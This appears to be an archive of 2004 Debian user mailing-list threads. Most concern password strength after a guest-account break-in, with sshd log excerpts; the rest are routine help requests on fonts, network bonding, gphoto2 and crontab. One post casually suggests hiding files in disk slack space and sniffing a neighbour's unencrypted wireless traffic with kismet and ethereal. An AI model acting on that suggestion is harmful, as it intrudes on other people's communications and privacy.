Re: See what a weak password will get ya?
Quoting "s. keeling" <[EMAIL PROTECTED]>: > Incoming from Scarletdown: > > > > An example of a good password (though since I'm posting it here, it can > > no longer be considered good) is: > > > > [EMAIL PROTECTED] > > I disagree. A cracking program is going to attempt to match > permutations of dictionary words. This will not add much more time to > reach the solution. Better is concatenation of two strings that won't > match a dictionary pattern: > > b1rDW0rm What also makes pretty good passwords is shifting your hands around on the keyboard. Take a simple to remember password (long enough) and then when typing on the keyboard, don't press the key you need but the on below it to the right (for example). slartibartfast becomes: x.zfgl zfgvzxg Letters to the right of the keyboard is best since they yield plenty of '\]\'/// stuff :) Also using shift every other letter or such is good. Be creative and combine different techniques instead of depending on one. A friend of mine once was complaining that he couldn't think of a decent password, so I made him this one: [EMAIL PROTECTED] Straight for the ass! (he's a dirty mind) Passwords are fun ;) joost DISCLAIMER This e-mail and any attached files are confidential and may be legally privileged. If you are not the addressee, any disclosure, reproduction, copying, distribution, or other dissemination or use of this communication is strictly prohibited. If you have received this transmission in error please notify A.S.T.R.I.D. nv/sa immediately and then delete this e-mail. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: See what a weak password will get ya?
on Thu, Jul 22, 2004 at 07:24:01PM -0700, Scarletdown ([EMAIL PROTECTED]) wrote: > Paul Stolp wrote: > >I checked in on some bittorrent progress today at lunch, noticed my > >I'm not sure the July 19 log snippet is related, but seems likely. > >Anyways, I've re-downloaded the files the attacker used and removed (for > >posterity.) > >I changed all passwords, IP Address, I found the evidence at about > >12:24. > >Just wanted to share the need for strong passwords. > > I second that recommendation. I always prefer to have passwords with > the following features: > > Minimum of 8 characters > At least 1 capital letter > At least 1 lower case letter > At least 1 number > At least 1 special character > > An example of a good password (though since I'm posting it here, it can > no longer be considered good) is: > > [EMAIL PROTECTED] My own preference is the 'pwgen' and 'gpw' utilities included in Debian, combined with either the PalmOS "Keyring" utility or the vim "editing encrypted files transparently" hack documented at: http://twiki.iwethey.org/Main/IwtNix Sample pwgen output: Eive3viequ oos5eigooV aeR0ahwein ooNigh1oos Jui6hailel oMaex1ohve xah8shoJai Ahnaotach9 Paiphie9ph pah8ahcaeG Uapahph6ik taiYolu4os aiHahp7jae usheXeec7a Ucei9joong Eteefa6aeg Eethohqu2i neiBaeg4ai Eiri7eagee Pahceibie8 Yeg0iediev eigiji6Gie Ouduo7pahs ya1weuNapo And for gpw: ulingain atailsel stedamen misavisi gasseder uarscroc rismener rectivac icadoura ishoonce What may not be immediately apparent is that the generated passwords are pronounceable in a rough sort of a way. The generation algorithms are tunable to greater randomnes or mnemonic qualities. It's possible to test quality by generating a known number of passwords, sorting and generating a uniq list, and counting the resulting lines. My findings are that even the relatively mnemonic lists are of very high quality. Best tests are on 1m or more paswords, but for a relatively short run of 100,000: $ time gpw 10 10 | sort | uniq | wc -l 99952 real0m9.968s user0m9.730s sys 0m0.050s $ time pwgen 10 10 | sort | uniq | wc -l 99960 real1m1.252s user0m13.550s sys 0m45.360s That's 99.952% and 99.960% uniq, respectively, default settings, ten-character keys. The observent reader will note that the length and count arguments are reversed for these utilities Remember this as you use them. For an adult user population, I find that these keys are usually pretty acceptable. Working with children, I'm using longer keys by combining a set of things. Favorites is a good one, and typical keys run 10-15 characters. Cryptanalysts will tell you that sticking to dictionary words reduces the search space markedly, but in balance, it's a good compromise. With a user-base extending into the hundreds, only a handful of the youngest routinely have problems logging in, and I know the keys are not likely used elsewhere. Druthers? I'd echo Greg Folkert's recommendations for key-based authentication, and use a fob-based password generator plus a PIN. Something randomly generated, something you have, something you know. Playing percentages, that's a pretty decent system. Biometrics? The shortage of replacement keys, and perverse incentives to key aquisition (and resultant discomfort) makes me *exceptionally* wary. Color me dubious (and leave me my digits and irises). Peace. -- Karsten M. Self <[EMAIL PROTECTED]>http://linuxmafia.com/~karsten Ceterum censeo, Caldera delenda est. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: which package owns system busy icon
"J.S.Sahambi" <[EMAIL PROTECTED]> writes: > I would like to know which package owns the icon which is displayed > when system is busy. Not exactly giving us much to work with. What software are you specifically talking about? Have you tried finding the icon files and looking them up on http://packages.debian.org/ ? pgpxM3YHqVGLl.pgp Description: PGP signature
truetype fonts in Mozilla - only good when page is UTF-8, bad otherwise
I use latest Debian unstable, GNU/Linux system. I would like to use only truetype fonts for webpages in my Mozilla browser, because the PCF fonts look ugly. These are the only packages that have anything to do with fonts, that I have installed: defoma fontconfig gsfonts gsfonts-x11 libfontconfig1 libfreetype6 libt1-5 libxft1 libxft2 ttf-arphic-gkai00mp ttf-bitstream-vera ttf-freefont ttf-kochi-mincho xfonts-base I deliberately did not install xfonts-100dpi or xfonts-75dpi becasue I do not want to use these fonts at all. When I view a page which uses UTF-8 or ISO-8859-1 or US-ASCII encoding, truetype fonts are used, and it looks beautiful. However if a page uses ISO-8859-2 or some other encoding, then fonts are ugly, I suspect that fonts from the gsfonts package are used. I would remove the gsfonts package, but xpdf depends on it. Is there some other PDF reader that can use only truetype fonts to view PDFs, so I can remove gsfonts? The package gsfonts-x11 is "Make Ghostscript fonts available to X11" so I suspect that removing that might fix the problem, but j2re1.4 depends on it! Anyway, what is the proper way to resolve this problem? -- Miernik _ xmpp:[EMAIL PROTECTED] ___/__ tel: +427 __/ mailto:[EMAIL PROTECTED] http://www.miernik.ctnet.pl/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: enable duplex
Quoting Jacob Friis Larsen <[EMAIL PROTECTED]>: > When I enable both eth0 and eth1 the network only works after boot when > I do /etc/init.d/networking restart That's odd. Check the dmesg output to see what goes wrong suring boot. [...] > Also when I set up bonding I can not use the network. This is what I did: > modprobe bonding miimon=250 mode=1 > ifconfig bond0 81.7.167.228 netmask 255.255.255.240 > ifenslave bond0 eth0 eth1 Hmm, from the top of my head that seems ok. Did the modprobe module load properly? (what's in dmesg). Can you see the bond0 interface in ifconfig ? What's the output of ifconfig? What's your routing table like after the bonding? route -n Can you ping the addresses of the 3 interfaces? ping 81.7.167.226 ping 81.7.167.227 ping 81.7.167.228 Can you ping another host on the same network. ping 81.7.167.229 What does arp -a show you. > Any clues? Not at the moment, but maybe the extra info shows something. joost DISCLAIMER This e-mail and any attached files are confidential and may be legally privileged. If you are not the addressee, any disclosure, reproduction, copying, distribution, or other dissemination or use of this communication is strictly prohibited. If you have received this transmission in error please notify A.S.T.R.I.D. nv/sa immediately and then delete this e-mail. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Documentation for NetJuke
Anybody got documentation for NetJuke ??? I think it's gonna be a nice web apps package but unfortunely I can't get any good documentation on it ( even after browsing in its official site ) cheers, --me-- -- -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.2.4 (GNU/Linux) mQGiBEDato0RBADHD8bKvVCTORppg/pot1Zuyx4Joz/IC34aZlLkG7/JNEVemqiB jSVgnwxa9UNs9Chz9CT6vqzw1pgPXDAb1rD91kbupatgaFUlNEwAW/v2eH8LQEYz 3NicbaysYeeJLBOYlwtmbZWrV8KKoSNrHWxZRjfl4a7TGggllou6+sAQTwCg/2Q2 lLLdPjuaXGiRHqpHFuFWVT8D/Rfzi89GrGWwharBmqNlq3WNJJSK4NdZUy6yFrfY mqaytOBUq6wWoM9OdvAciS4R1qVK2GItV2xIX9N47zeEXspsANF3PyH6PSdXBYfO CDL6jdkL1JS/E+QQcOsqbwkJOa3IpSuJPuE0IuYj9G2pEUNFR9/QiNVq2ysqUK8I V/8VBACmL758SPyrMSwA2sPGiRbSndr0Bc6XW/YPwvJNQsU+zzX+qtAP4K3oEX7R z1OD6LfkJAvrCLswNJbyIlrsFSo/NxlsqnWgKU4K4qsntvMA2UiyAUCOONCn+7Uo V8UVK/3ZKRAlnTM6YdxEWe1c09pP3k4kxGdii5E3cJu6a1a4jbYxZGViaWFu IChKVVNUIFNJR05BVFVSRSkgPGRlYl9taWxpc3RAeWFob28uY29tLnNnPohbBBMR AgAbBQJA2raNBgsJCAcDAgMVAgMDFgIBAh4BAheAAAoJEP6KKTciHvMpKQgAoLl1 8lYWPDqcTtRwNyPBA5UhlbHIAKDAjaZYyTgyYU2xtacqPDqsMzf/N4hJBBMRAgAJ BQJA5AJfAgcAAAoJEAiiw5gMTBnLYAUAoKeNbaExa+6oJIz9WWYgsVUO8KW9AJ4m oP4njy83Cl7bnbacBW7o9doj6rkBDQRA2raQEAQAqzfMQUbVLt/iFTDFcI3XSO26 v2BYQAvHdRkMGo8AFrffJCbEFfTlyCrTbhIHKB0D6Z8+lEqdsjJlwleNWDWTu3gY hOvUeGqCiNmPRGeYjM5VatsUNMQLS6qGVbpaiHXZ75e6Vco3MjMEKN1KQDn3QdtW JcW32LPA5XqrEbInV1MAAwYD/idygDdnBgOUNEfN+JVFr3OUuVBTxky6VZ08mYbj VmE/tFDh+H9o0GdHAMrvXbITFau6BR3ykNXtVPRMlT+g1pCe91RovR+WwfLItFnC eB6lfiu4tsdPWeBWPKbdQO7zb1Wj6U/yo5JcjNjQjBHpxuoTpicYYgKiFIIhHzIG kt9MiEYEGBECAAYFAkDatpAACgkQ/oopNyIe8ykmwgCfZLcfyNlAVIpfhyhjJPDb LYJsBc8AnRz9PqrchdlrWSonVBgsHg0VZml+ =sm88 -END PGP PUBLIC KEY BLOCK- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: cracking - Re: See what a weak password will get ya?
On Thu, 22 Jul 2004, s. keeling wrote: > Incoming from Alvin Oga: > > > > - and hopefully, they don't have the passwd file from /etc/shadow > > to compare against > > Agreed. Once they're in, all bets are off. best to assume they are already in and sniffing .. 24x7 and work knowing they can pick up info from their hidden special directory - if you write a single "a" into /tmp/a.txt the other 511 bytes is available for a secret filesystem ( lots of unused disk space available for hiding ( that regular tools will never find these constantly changing ( hidden files > Why bother to crack if you can sniff? but they and anybody can sniff ??? and yes ... 10x easier to sniff and maybe even get lucky and get the passwd to all their machines at work too - sniff your boxes at the colo ... ( lots of wrong masks being set, to be able to sniff other ( machines - sorta illegal to sniff ?? - sniff the wireless connection ... 1/2 the wireless network is not encrypted, so hopefyully, they are least using ssh for all data transfers ( good for tricking a few people to hang around longer ( to see what they're sniffing on an unencrypted wep traffic - kimet + ethereal .. see your neighbor's data c ya alvin -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: how to edit a pdf file in linux
on Thu, Jul 22, 2004 at 06:28:15AM -0500, Nate Bargmann ([EMAIL PROTECTED]) wrote: > * Karsten M. Self <[EMAIL PROTECTED]> [2004 Jul 22 06:09 -0500]: > > The point should be reiterated, however, that PDF is a *display* format, > > not a preferred for for modifying texts, and in general, your best bet > > is to go back to the source document itself. > > So, using pdf2ps and expecting to be able to "edit" the resulting Post > Script file is probably moot as well. Actually, that's about the level of editing I'd expect to be reasonable: you're creating an overlay to put on top of the existing form. PS => PDF conversions are trivial w/ pstools. > At times it would nice to be able to download a PDF form and "edit" it > by adding micely fonted test into the blanks. Um. Sure. In theory. Refer to standard lore on theory vs. practice. Peace. -- Karsten M. Self <[EMAIL PROTECTED]>http://linuxmafia.com/~karsten Ceterum censeo, Caldera delenda est. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Configuring mozilla-plugin-vlc to use esd
I was happy to see that the mozilla-plugin-vlc package is able to do some nifty things. However, I'd like it to speak to my esd daemon. I went to: http://tvplex.go.com/buenavista/ebertandroeper/popmp3_2.html?040719-metallicasomekindofmonster and there wasn't any sound until I ran "esdctl off". There didn't seem to be a context menu where I might be able to adjust it. There wasn't really any good user documentation in /usr/share/doc/mozilla-plugin-vlc. Thoughts? -- Bill Wohler <[EMAIL PROTECTED]> http://www.newt.com/wohler/ GnuPG ID:610BD9AD Maintainer of comp.mail.mh FAQ and MH-E. Vote Libertarian! If you're passed on the right, you're in the wrong lane. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
unsubscribe
Connection Timeouts with Polaroid DC700 - Serial
Up until a few months ago, gphoto2 worked great with my Polaroid PDC700 camera, which is connected to the first serial port (/dev/ttyS0). After doing a dist-upgrade, I can no longer download pictures out of my camera. I know the port is good, as I can reboot to the Windows-98 side of my system and download pictures from there, so I am guessing that this is a problem with gphoto2 itself, possibly whichever version is sitting in the debian/unstable archives. Here is the output from the gphoto2 command with the --debug option: 0.09 main(2): ALWAYS INCLUDE THE FOLLOWING LINES WHEN SENDING DEBUG MESSAGES TO THE MAILING LIST: 0.000339 main(2): gphoto2 2.1.4 0.000475 main(2): gphoto2 has been compiled with the following options: 0.000631 main(2): + gcc (C compiler used) 0.000769 main(2): + no popt (for handling command-line parameters) 0.000924 main(2): + exif (for displaying EXIF information) 0.001072 main(2): + cdk (for accessing configuration options) 0.001221 main(2): + no aa (for displaying live previews) 0.001368 main(2): + jpeg (for displaying live previews in JPEG format) 0.001522 main(2): + readline (for easy navigation in the shell) 0.001676 main(2): libgphoto2 2.1.4 0.001812 main(2): libgphoto2 has been compiled with the following options: 0.001972 main(2): + gcc (C compiler used) 0.002111 main(2): + EXIF (for special handling of EXIF files) 0.002263 main(2): + no ltdl (working around buggy libltdl, eh? :-) 0.002418 main(2): + /proc/meminfo (adapts cache size to memory available) 0.002583 main(2): libgphoto2_port 0.5.1 0.002721 main(2): libgphoto2_port has been compiled with the following options: 0.002881 main(2): + gcc (C compiler used) 0.003019 main(2): + USB (for USB cameras) 0.004466 main(2): + serial (for serial cameras) 0.004726 main(2): + no resmgr (serial port access and locking) 0.004877 main(2): + no baudboy (serial port locking) 0.005023 main(2): + no ttylock (serial port locking) 0.005171 main(2): + no lockdev (serial port locking) 0.005317 main(2): + no ltdl (working around buggy libltdl, eh? :-) 0.005880 gphoto2-camera(2): Listing files in '/'... 0.006052 gphoto2-camera(2): Initializing camera... 0.006202 gphoto2-camera(2): Loading '/usr/lib/gphoto2/2.1.4/libgphoto2_polaroid_pdc700.so'... 0.006504 gphoto2-port(2): Opening SERIAL port... 0.006678 gphoto2-port-serial(2): Trying to lock '/dev/ttyS0'... 0.006884 gphoto2-port(2): Setting timeout to 1000 millisecond(s)... 0.007055 gphoto2-port(2): Setting settings... 0.007199 gphoto2-port-serial(2): Setting baudrate to 115200... 0.007417 gphoto2-port(2): Writing 5=0x5 byte(s) to port... 0.007580 gphoto2-port(3): Hexdump of 5 = 0x5 bytes follows: 40 00 02 01 01 - @ 0.013208 gphoto2-port(2): Reading 3=0x3 bytes from port... 0.013374 gphoto2-port(3): Hexdump of 3 = 0x3 bytes follows: 40 03 00 - @.. 0.013597 gphoto2-port(2): Reading 3=0x3 bytes from port... 0.013750 gphoto2-port(3): Hexdump of 3 = 0x3 bytes follows: 81 01 82 - ... 0.013995 gphoto2-filesystem(2): Listing files in '/'... 0.014154 gphoto2-filesystem(2): Querying folder /... 0.014302 gphoto2-port(2): Writing 5=0x5 byte(s) to port... 0.014455 gphoto2-port(3): Hexdump of 5 = 0x5 bytes follows: 40 00 02 02 02 - @ 0.023264 gphoto2-port(2): Reading 3=0x3 bytes from port... 0.023425 gphoto2-port(3): Hexdump of 3 = 0x3 bytes follows: 40 43 00 - @C. 0.023651 gphoto2-port(2): Reading 67=0x43 bytes from port... 0.033158 gphoto2-port(3): Hexdump of 67 = 0x43 bytes follows: 82 01 01 12 04 02 01 13-01 00 76 32 2e 34 35 65 ..v2.45e 0010 00 00 03 00 17 00 00 01-01 04 32 24 04 00 4e 23 ..2$..N# 0020 21 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 !... 0030 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 0040 00 00 62 - ..b 0.033639 gphoto2-filesystem(2): Added 'PDC701.jpg' 0.033795 gphoto2-filesystem(2): Added 'PDC702.jpg' 0.033949 gphoto2-filesystem(2): Added 'PDC703.jpg' 0.034100 filesys(2): Listed 'PDC701.jpg' 0.034243 filesys(2): Listed 'PDC702.jpg' 0.034384 filesys(2): Listed 'PDC703.jpg' 0.034546 gphoto2-camera(2): Getting file 'PDC701.jpg' in folder '/'... 0.034716 libgphoto2/gphoto2-filesys.c(2): Getting file 'PDC701.jpg' from folder '/' (type 1)... 0.035342 context(2): Downloading 'PDC701.jpg' from folder '/'... Downloading 'PDC701.jpg' from folder '/'... 0.035897 pdc700/pdc700.c(2): Getting info about picture 1... 0.036072 gphoto2-port(2): Writing 7=0x7 byte(s) to port... 0.036225 gphoto2-port(3): Hexdump of 7 = 0x7 bytes follows: 40 00 04 05 01 00 06 - @.. 0.044761 gphoto2-port(2): Reading 3=0x3 bytes from port... 0.044950 gphoto2-port(3): Hexdump of 3 = 0x3 bytes follow
which package owns system busy icon
I would like to know which package owns the icon which is displayed when system is busy. Thanking in advance JSS -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: cracking - Re: See what a weak password will get ya?
Incoming from Alvin Oga: > > - and hopefully, they don't have the passwd file from /etc/shadow > to compare against Agreed. Once they're in, all bets are off. Why bother to crack if you can sniff? -- Any technology distinguishable from magic is insufficiently advanced. (*) http://www.spots.ab.ca/~keeling - - -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
it was supposed to be my first DVD
It's my first DVD, and # mplayer dvd://1 libdvdread: Using libdvdcss version 1.2.5 for DVD access libdvdread: Could not open /dev/dvd with libdvdcss. libdvdread: Can't open /dev/dvd for reading Couldn't open DVD device: /dev/dvd Does this mean the physical device, # cat /proc/ide/ide1/hdd/m* cdrom DVD-ROM DDU1621 is bad? or is my lilo.conf append="pci=biosirq hdc=ide-scsi hdd=ide-scsi max_scsi_luns=1" bad? and why above does it say cdrom? I assume it is these issues and we haven't even got to the encryption business. Yes I linked hdd->dvd. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
cracking - Re: See what a weak password will get ya?
On Thu, 22 Jul 2004, s. keeling wrote: > > > I disagree. A cracking program is going to attempt to match > > > permutations of dictionary words. This will not add much more time to ... how fast can a cracking system go thru dictionary words that are mispelled with various digits and special char - changing o to 0 ( and equivalents ) wont slow down the crackers - brute force cracking will take 60**8 permutations (1.7x10**14) :-) ( a-z A-Z 0-9 30special chars ) - a small number of permutations by math standards - but NOT all character positions will be special random characters which than simplifies the possible permutations if you can think of these modified passwd, a good cracking program should already be checking for it too :-) -- a trick question ... how does the cracker know that they hit the right passwd ?? - they cant be logging into your box for each try - your box should be denying remote access after 3-5 failed login attempts - and hopefully, they don't have the passwd file from /etc/shadow to compare against > However, if you haven't moved to RSA based longer passwords, that's > effectively "x[([EMAIL PROTECTED])" (which isn't bad, but you may be typing more than > is recognized). Stock passwords are eight chars. The rest are ignored. it seem like some systems uses more than 8char pwd and others ignore the balance .. c ya alvin -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: See what a weak password will get ya?
Mathieu Ducharme <[EMAIL PROTECTED]> said on Thu, 22 Jul 2004 23:33:48 -0400: > I'm pretty sure dictionary attack also look for this. (?) > > Use other characters that will make the word absolutely not dictionar- related > > x[([EMAIL PROTECTED])~(w0rD)]x > > Still as easy to remember (longer to type though) I don't rememeber my password, my fingers do. Which means, that when you come off a plane with your BIOS passwd protected laptop that you had been using fine for quite some time on the plane and at the airport, and you develop a massive headache, then the headache goes away, and you plug in, and try to remember your password, because your fingers are getting it wrong, well, no good happens. So you try to log in to your home institution, thinking that maybe the BIOS absorbed a few too many cosmic rays, and start panicking, because none of the passwords you have used in the past 5 years works. Eventually, let the pain in your head subside, and find out that that headache simply caused your brain to forget that you changed passwords about a month back, and somehow your fingers aren't remembering for the time being :) -- TimC -- http://astronomy.swin.edu.au/staff/tconnors/ "Does bacteria culture in coffee cup qualify as pet? Have already givink it name." -- Pitr Dubovich/User Friendly -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: See what a weak password will get ya?
On 2004-07-22, Paul Stolp penned: > > Anyways, I've re-downloaded the files the attacker used and removed > (for posterity.) I changed all passwords, IP Address, I found the > evidence at about 12:24. Just wanted to share the need for strong > passwords. I'd add the suggestion to not use obvious usernames like "guest" ... Btw, are you 100% sure they never managed to root you and replace some of your files? -- monique -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: See what a weak password will get ya?
On Thu, 2004-07-22 at 22:59, s. keeling wrote: > Incoming from Scarletdown: > > > > An example of a good password (though since I'm posting it here, it can > > no longer be considered good) is: > > > > [EMAIL PROTECTED] > > I disagree. A cracking program is going to attempt to match > permutations of dictionary words. This will not add much more time to > reach the solution. Better is concatenation of two strings that won't > match a dictionary pattern: > > b1rDW0rm > > > |< == K > > >< == X > > |> == P > > > > Anyone else care to add to this little list? > > Hadn't thought of those. Cute. > > Apparently, the best is to replace crypt based passwords with RSA > based, and use longer passwords. Actually, best actual reasonable password is: to not use one Use key-based authentication. Personally, I use 2048bit keys for machine that are considered core/valuable. Play machines... only get 1024bit. I have a master private key, with everything being generated as subkeys from that. Yeap, the passphrase for it is actually purty darn long. It is one of those things you hate to type in. I really think about how long it is, it just flows from the hands. Now come to think of it... at least 25 characters long. Key authentication is by far much more secure than a regular password. Best part is, you can make it so you only have to type your pass phrase ONCE! -- greg, [EMAIL PROTECTED] The technology that is Stronger, better, faster: Linux signature.asc Description: This is a digitally signed message part
Re: winbind and pam_mount
On Thu, 2004-07-22 at 14:42, [EMAIL PROTECTED] wrote: > Hi, > > I am configuring a system to authenticate users against an AD windows > 2003 server, and if the user does not have a homedir it will > automatically be created on the Linux server. > > Ive managed to do all this using the winbind daemon, samba, kerboros > (for autherntication) to the AD server. > > However i would like to take this one step forward so that users > windows "Home Directories" are also automatically mounted upon logon > to the linux server, they need to be mounted within a mount folder > under their Linux homedir . > > i can do this using pam_mount, but this means i need to know exactly > which windows server the users homedirectory is located, i would like > a way for querying the ADS to check which windows server the user is > on and then automatically mount the windows homedir on the linux > server. > > Does anyone have a script or know anyway this can be done? Well, I believe there are some references I'll have to look for... But, what I am REALLY looking for is for you to send me a confidential or sanitized smb.conf. I am struggling severely right now with the exact issue you have solved. Beggin. I'll do the research for the pam stuff and help out that way... Honest!!! -- greg, [EMAIL PROTECTED] The technology that is Stronger, better, faster: Linux signature.asc Description: This is a digitally signed message part
SOLVED: /bin/sh: line 1: root: command not found
Christopher L. Everett wrote: People, I keep getting these emails, from multiple servers relating to entries in /etc/crontab. AFAIK, I'm doing everything right (maybe not the best way technically, but following what the documentation says): -- using crontab -e -- looks the same to me as a working crontab on another server -- crontab package versions the same as a working crontab -- checked `man -e5 crontab` to see I had the correct format I've googled for about 3 hours, and nothing that looks like an answer, despite the fact that the problem happens often enough to deserve a FAQ. I did find where for some reason, vi stuck a 2 byte UTF-8 character in for the tab key (why? why? why?), but replacing it with a space did not help, the only difference now is that the wide character doesn't show on the subject line in my Mozilla mailbox. In fact I replaced all the tabs in /etc/crontab with space to no effect. I'm all out of clue and this has my production servers snarled up. Any ideas here? I figured it out: I believe another sysadmin ran `crontab /etc/crontab`, which hosed everything up. I found the answer on a BSD FAQ page of all places. Making a copy of /etc/crontab, running `crontab -r` to remove all the cronjobs, and restoring the /etc/crontab file did the trick. The info and man pages for cron & crontab do not tell you not to use `crontab /etc/crontab`, though they don't tell you to do it either. -- Christopher L. Everett Chief Technology Officer www.medbanner.com MedBanner, Inc. www.physemp.com -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: OT: Re: See what a weak password will get ya?
Incoming from Paul Stolp: > * s. keeling <[EMAIL PROTECTED]> [2004-07-22 22:03]: > > Incoming from Paul Stolp: > > > look for damage, whew, I was O.K. -- I'm sure it helps to be up to date > > ... > > > > How did you manage to verify that? Are you running chkrootkit? > > tripwire? Something else? > > chkrootkit, plus verification of md5sums of certain binaries. Good luck. You're drivin'. Me? I'd at least take it off-line and burn a CD. Then you can have something to compare it to if anything starts to look wonky in the future. -- Any technology distinguishable from magic is insufficiently advanced. (*) http://www.spots.ab.ca/~keeling - - -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: See what a weak password will get ya?
Paul Stolp wrote: * dircha <[EMAIL PROTECTED]> [2004-07-22 21:48]: Scarletdown wrote: |< == K < == X |> == P Anyone else care to add to this little list? 0 == O $ == S |-| == H |_| == U |_ == L \/\/ == W /\/\ == M |V| == M |\| == N |-o-| == tie fighter {-o-} == tie interceptor Good plan, I need to improve my ascii art collection. ^ = V or n //well, sort of :-0 ! = i 4 = A & = G 3 = E 5 = S + = T i suppose now i ought to look at the rest of the thread too (i didn't notice where it started) ~c signature.asc Description: OpenPGP digital signature
Re: See what a weak password will get ya?
* Chris Metzler <[EMAIL PROTECTED]> [2004-07-22 22:18]: > On Thu, 22 Jul 2004 17:42:53 -0500 > Paul Stolp <[EMAIL PROTECTED]> wrote: > > > > shutdown -h now ! > > Believe it or not, this is often a bad idea. It's often easier to > determine the scope of a compromise by watching the intrude for a little > while than to attempt to find out afterwards with forensics. I thought this afterwards, but it appears the attacker went away empty handed anyways. He was already logged out when I noticed the high load. He tried to kill the "t" program, but couldn't. I suspect he was somewhat inept (as was I with the pathetic password I assigned to the guest account!) in reviewing the logs and bash history, it becomes fairly easy to piece together. I will definitely consider your advice when I'm in this situation again. > > > look for damage, whew, I was O.K. > > How did you determine this? chkrootkit and, more satisfying to me, md5sums of some key binaries. Thanks, Paul -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: OT: Re: See what a weak password will get ya?
* s. keeling <[EMAIL PROTECTED]> [2004-07-22 22:03]: > Incoming from Paul Stolp: > > I checked in on some bittorrent progress today at lunch, noticed my > > process monitor showing full activity. Ran top, saw user "guest" logged > > on, running 4 instances of a program named "t", and short term load > > average over 4. AAGGGHHH! > > shutdown -h now ! > > pull network cable > > reboot > > look for damage, whew, I was O.K. -- I'm sure it helps to be up to date > ... > > How did you manage to verify that? Are you running chkrootkit? > tripwire? Something else? chkrootkit, plus verification of md5sums of certain binaries. > > (0) keeling /home/keeling_ host smenlove.home.ro > smenlove.home.roA 81.196.20.133 > > (0) keeling /home/keeling_ ripe 81.196.20.133 > inetnum: 81.196.20.128 - 81.196.20.159 > netname: RO-RDS-HOME-RO > descr:Home.RO / Go.RO > country: RO > admin-c: HAD6-RIPE > tech-c: HAD6-RIPE > status: ASSIGNED PA > remarks: INFRA-AW > remarks: +---+ > remarks: | ABUSE CONTACT: [EMAIL PROTECTED] IN CASE OF HACK ATTACKS, | > remarks: | ILLEGAL ACTIVITY, VIOLATION, SCANS, PROBES, SPAM, ETC.| > remarks: +---+ > ... > Reported. > > > Jul 22 10:24:39 greta sshd[22405]: Accepted password for guest from > > 156.17.99.11 > > port 37228 ssh2 > > Jul 22 10:24:39 greta sshd[22407]: (pam_unix) session opened for user > > guest by ( > > uid=0) > ...^ > maybe I'm missing something, but isn't that how sshd works? That's what I get logging in from my usual account... > > Jul 22 12:09:33 greta sshd[22595]: Accepted password for guest from > > 80.110.102.105 port 3938 ssh2 > > Jul 22 12:09:33 greta sshd[22597]: (pam_unix) session opened for user > > guest by (uid=0) > > Jul 22 12:12:45 greta passwd[22663]: (pam_unix) authentication failure; ^^^ > > logname=guest uid=1002 euid=0 tty= ruser= > .^^ > > > > Just wanted to share the need for strong passwords. > > Not to mention backups and fresh installation media? > You better believe it! -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: See what a weak password will get ya?
* dircha <[EMAIL PROTECTED]> [2004-07-22 21:48]: > Scarletdown wrote: > >|< == K > > >< == X > >|> == P > > > >Anyone else care to add to this little list? > > 0 == O > $ == S > |-| == H > |_| == U > |_ == L > \/\/ == W > /\/\ == M > |V| == M > |\| == N > |-o-| == tie fighter > {-o-} == tie interceptor Good plan, I need to improve my ascii art collection. -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: See what a weak password will get ya?
Incoming from Mathieu Ducharme: > On July 22, 2004 10:59 pm, s. keeling wrote: > > Incoming from Scarletdown: > > > An example of a good password (though since I'm posting it here, it can > > > no longer be considered good) is: > > > > > > [EMAIL PROTECTED] > > > > I disagree. A cracking program is going to attempt to match > > permutations of dictionary words. This will not add much more time to > > > > b1rDW0rm > > I'm pretty sure dictionary attack also look for this. (?) It was just an example. I sprinkle liberally with punctuation. :-) > Use other characters that will make the word absolutely not dictionary related > > x[([EMAIL PROTECTED])~(w0rD)]x However, if you haven't moved to RSA based longer passwords, that's effectively "x[([EMAIL PROTECTED])" (which isn't bad, but you may be typing more than is recognized). Stock passwords are eight chars. The rest are ignored. -- Any technology distinguishable from magic is insufficiently advanced. (*) http://www.spots.ab.ca/~keeling - - -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". 